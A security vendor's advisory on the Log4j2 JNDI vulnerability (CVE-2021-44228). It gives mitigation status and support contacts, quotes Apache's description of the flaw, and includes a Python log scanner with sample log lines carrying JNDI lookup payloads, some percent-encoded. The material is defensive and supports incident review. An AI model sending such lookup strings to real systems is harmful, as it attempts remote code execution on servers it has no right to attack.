Apache Log4j2 <=2.14.1 JNDI remote code exploit

UPDATE: as at 10:39pm EST / 2:39pm AEDT / 4:23pm NZT

Following our earlier communication on the zero-day security vulnerability (CVE-2021-44228), we are confirming as at 4:23pm NZT that, for RedShield Cloud customers, our engineers have deployed new shields across all of the applications we service for you, ahead of schedule. Our team developed these new shields overnight and fully tested their effectiveness against exploitation, so you can be confident your apps are shielded from this vulnerability.

What’s next?
We would like to reiterate that this new vulnerability is of high severity and is being actively exploited. We strongly advise checking your logs for the period before this new shield was deployed.

Remediating this vulnerability can be complex and take time. To immediately protect your other applications not shielded by RedShield, please log a P1 support ticket by calling the appropriate number below:

North America +1 (844) 977 3303

UK & Europe +44 118 324 2423

Australia +61 2 8880 0766

New Zealand +64 4 887 1117

For non-urgent support email


RedShield team



Earlier today we were notified by CISA, ACSC and CERTNZ of a far-reaching zero-day security vulnerability (CVE-2021-44228) that could allow remote code execution on a server by nefarious actors. It could impact online applications written in Java, and has already affected Minecraft: Java Edition, Apple, Amazon, Steam, Twitter, and more.

What are RedShield doing to protect against this vulnerability?
Our team has worked to quickly develop a shield for this specific vulnerability. We have since tested the efficacy of the shield and can confirm its effectiveness against exploitation of this vulnerability. We are currently in the process of deploying this new shield across all of the applications we service with RedShield Cloud and we estimate this will be completed within 24 hours from now. We’ll confirm once it has been completed.

For on-premise RedShield customers, we'll contact you directly to schedule shield updates which cover this vulnerability.

What can you do in the meantime?
We strongly recommend you review your logs for the last day as soon as possible as a precaution. If you have other applications using Java that are not yet in blocking mode behind RedShield that you would like this shield applied to urgently, please log a P1 support ticket by calling the appropriate number below:

North America +1 (844) 977 3303
UK & Europe +44 118 324 2423
Australia +61 2 8880 0766
New Zealand +64 4 887 1117

For non-urgent support email


Apache Log4j2 <=2.14.1 JNDI remote code exploit




RedShield is currently mitigating attempts by a number of attackers to exploit this vulnerability. Further mitigation measures are being rolled out across the network in anticipation of changing exploitation attempts.


Customers who are using Apache Log4j2 <=2.14.1 JNDI features in configuration, log messages, and parameters should note the following:


“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.”
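For the log review recommended above, the following is an added example (not RedShield's or Apache's code) that scans access-log lines for the JNDI lookup syntax the quoted advisory describes, including percent-encoded and double-encoded forms. The function names, the log format and the sample lines are constructed for illustration; a hit shows that a lookup string was received, not that it was executed.

```python
import re
from urllib.parse import unquote

# Start of a Log4j2 JNDI lookup: "${jndi:<scheme>://<host>". The advisory names
# LDAP "and other JNDI related endpoints", so the scheme is captured, not fixed.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:/*([^/}\s:]*)", re.IGNORECASE)
# A lookup opened inside another lookup; flagged for manual review only.
NESTED = re.compile(r"\$\{[^}]*\$\{")

def decode(text, rounds=3):
    """Percent-decode repeatedly so encoded and double-encoded input is seen."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan(lines):
    """Return (line_no, verdict, scheme, host) for every suspicious line."""
    findings = []
    for no, raw in enumerate(lines, 1):
        text = decode(raw)
        match = JNDI.search(text)
        if match:
            findings.append((no, "jndi-lookup", match.group(1).lower(), match.group(2)))
        elif NESTED.search(text):
            findings.append((no, "nested-lookup", None, None))
    return findings

# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [10/Dec/2021:09:14:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2021:09:15:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://host.example.invalid/a}"',
    '198.51.100.23 - - [10/Dec/2021:09:16:11 +0000] "GET /?q=%24%7BJNDI%3Armi%3A%2F%2Fhost.example.invalid%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '192.0.2.50 - - [10/Dec/2021:09:17:30 +0000] "GET /?q=%2524%257Bjndi%253Adns%253A%252F%252Fhost.example.invalid%257D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '192.0.2.50 - - [10/Dec/2021:09:18:05 +0000] "GET /?x=${a:${b}} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Treat the captured host as a lead for egress review: check whether the affected server made outbound connections to it around the logged time.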


For further details please see the following CVE announcement:
